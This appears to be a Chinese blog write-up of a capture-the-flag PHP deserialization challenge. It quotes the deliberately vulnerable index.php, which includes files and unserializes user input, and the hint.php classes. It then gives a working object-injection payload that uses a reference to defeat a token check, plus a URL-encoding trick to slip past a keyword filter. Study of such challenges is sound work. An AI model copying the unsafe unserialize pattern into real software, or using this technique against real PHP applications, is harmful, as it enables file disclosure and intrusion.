一道反序化的题

当我在hint.php直接执行它是没有问题的,能读取flag

$a=new Flag(“flag.php”);
$a->token=&$a->token_flag;
$a = new Handle($a);
print serialize($a);

但反序列化字符串执行出现问题

加个urlencode编码 问题解决

index.php

<html>
<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){
//$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$query);
foreach($query as $value){
if (preg_match("/flag/",$value)) {
die('stop hacking!');
exit();
}
}
var_dump($payload);
$payload = unserialize($payload);
echo "<br>";
var_dump($payload);
}else{
echo "Missing parameters";
}
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->
</html>

hint.php

<?php
class Handle{
public $handle;//测试的时候改成public 原本peivate
public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
echo "Waking up\n";
}
public function __construct($handle) {
$this->handle = $handle;
var_dump("asasa");
}
public function __destruct(){
echo "1234";
$this->handle->getFlag();
}
}

class Flag{
public $file;
public $token;
public $token_flag;

function __construct($file){
echo "bbb";
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
}

public function getFlag(){
echo "aaaaa";
$this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
echo "aaa";
if(isset($this->file)){
echo @highlight_file($this->file,true);
}
}
}
}

//自己加的测试代码
$object = new Handle();
$object->handle=new Flag();
$object->handle->file="flag.php";
$object->handle->token=&$object->handle->token_flag;
print serialize($object);



?>

flag.php

flag

2019.4.21


发表评论

电子邮件地址不会被公开。 必填项已用*标注